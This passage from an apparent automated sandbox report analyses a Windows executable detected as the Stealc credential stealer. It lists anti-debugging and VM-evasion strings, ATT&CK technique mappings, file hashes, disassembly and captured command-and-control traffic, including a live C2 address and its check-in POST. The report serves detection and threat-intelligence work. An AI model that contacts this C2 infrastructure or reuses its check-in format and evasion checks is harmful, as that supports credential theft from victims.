                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0053DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, | 0_2_0053E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00544570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, | 0_2_00544570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, | 0_2_0053ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0053BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0053DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_005316D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0053F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00543EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, | 0_2_00543EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00531160 GetSystemInfo,ExitProcess, | 0_2_00531160
                Source: file.exe, file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware@
                Source: file.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1741085256.0000000001255000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1741085256.0000000001255000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWGe>
                Source: file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13436
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13487
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13447
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13433
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13455
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005345C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00547850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: file.exe | Binary or memory string: y Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00547B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00546920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00547850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00547A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Native API (11) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML | -
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/ws | 100% | URL Reputation | malware
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/BiQ | file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/C84BCA9C91821060E9A79u | file.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
                http://185.215.113.37/e2b1563c6670f193.phpF | file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
                http://185.215.113.37/e2b1563c6670f193.phphi | file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
                http://185.215.113.37/& | file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpJ | file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
                http://185.215.113.37/e2b1563c6670f193.phpConnectionSettings | file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
                http://185.215.113.37oZ | file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IP | Domain | Country | ASN | ASN Name | Malicious
                                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1531682
                                Start date and time:2024-10-11 15:59:10 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 2m 55s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:1
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 81%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 81
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe
                                No simulations
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                                185.215.113.37 | SecuriteInfo.com.Win32.Evo-gen.28528.9811.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/
                                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                                185.215.113.37 | nU3dGuezsg.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
                                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                                No context
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                                WHOLESALECONNECTIONSNL | SecuriteInfo.com.Win32.Evo-gen.28528.9811.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.103
                                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                                WHOLESALECONNECTIONSNL | nU3dGuezsg.exe | malicious | Amadey, Stealc | 185.215.113.103
                                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.947834924142802
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'813'504 bytes
                                MD5:1ad0ccf6d6aa03ebe1f0d87e2b21e748
                                SHA1:a48f39c5b5a61d2aabf0d98844041e6b8ee3861e
                                SHA256:3b22774fae4edcd3086ddfda63b8d6a7b469081f69845521570dc42f70a05e4d
                                SHA512:af2400ae871605233e336e47817bb4c26db88e6e45f77770fc12267067d4b50d80317f3ba025c409f2843f525a35eb71b4ad87f69cdd69d2604d5046bfb1d6c4
                                SSDEEP:24576:qR6I6Gy6+2lwI9lznUv3dVtb+irEDPXupObmQkzdHgjmV3ke4Ruztm8Z1xVL7Te:qRdXPlzUvXMUufuobdk5AkkezZZx7y
                                TLSH:CE8533AEEE27B3DDC4FA52B41C9BCFE4D940935E48AFCA4421345DB4B85F2DC2826854
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0xa8b000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007FFBC8E1629Ah
                                jp 00007FFBC8E162B1h
                                add byte ptr [eax], al
                                jmp 00007FFBC8E18295h
                                add byte ptr [edx+ecx], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                pop ds
                                add byte ptr [eax+000000FEh], ah
                                add byte ptr [edx], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+eax*4], cl
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                pop es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], cl
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                - | 0x1000 | 0x25b000 | 0x22800 | cfab91be806f659f17aba06f50d814a0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                - | 0x25e000 | 0x297000 | 0x200 | 5f42cc3e3158cd8393a37907263bbbb5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                iinbofzt | 0x4f5000 | 0x195000 | 0x194a00 | df5dc6680f85b8caa0dfcb4cca5e1187 | False | 0.9948670885464936 | data | 7.954146839777977 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                gnwcqqyo | 0x68a000 | 0x1000 | 0x400 | 87a921d6bf1276d759e3ac9c6df8b4bc | False | 0.8525390625 | data | 6.423582088348747 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant | 0x68b000 | 0x3000 | 0x2200 | c318f9e3cfb177cf36d258629697da57 | False | 0.06767003676470588 | DOS executable (COM) | 0.8875314144640459 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                DLL | Import
                                kernel32.dll | lstrcpy
                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2024-10-11T16:00:06.089634+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Oct 11, 2024 16:00:05.101735115 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                                Oct 11, 2024 16:00:05.107006073 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                                Oct 11, 2024 16:00:05.107136011 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                                Oct 11, 2024 16:00:05.107247114 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                                Oct 11, 2024 16:00:05.112150908 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                                Oct 11, 2024 16:00:05.834851980 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                                Oct 11, 2024 16:00:05.835119009 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                                Oct 11, 2024 16:00:05.853163004 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                                Oct 11, 2024 16:00:05.858232021 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                                Oct 11, 2024 16:00:06.089396000 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                                Oct 11, 2024 16:00:06.089633942 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                                Oct 11, 2024 16:00:10.815188885 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                                • 185.215.113.37
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6280 | C:\Users\user\Desktop\file.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 11, 2024 16:00:05.107247114 CEST | 89 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.37
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 11, 2024 16:00:05.834851980 CEST | 203 | IN | HTTP/1.1 200 OK
                                Date: Fri, 11 Oct 2024 14:00:05 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 11, 2024 16:00:05.853163004 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA
                                Host: 185.215.113.37
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 31 30 44 46 44 33 42 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a
                                Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="hwid"37E10DFD3B8E3984212470------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build"doma------DGHJEHJJDAAAKEBGCFCA--
                                Oct 11, 2024 16:00:06.089396000 CEST | 210 | IN | HTTP/1.1 200 OK
                                Date: Fri, 11 Oct 2024 14:00:05 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Target ID:0
                                Start time:10:00:02
                                Start date:11/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x530000
                                File size:1'813'504 bytes
                                MD5 hash:1AD0CCF6D6AA03EBE1F0D87E2B21E748
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
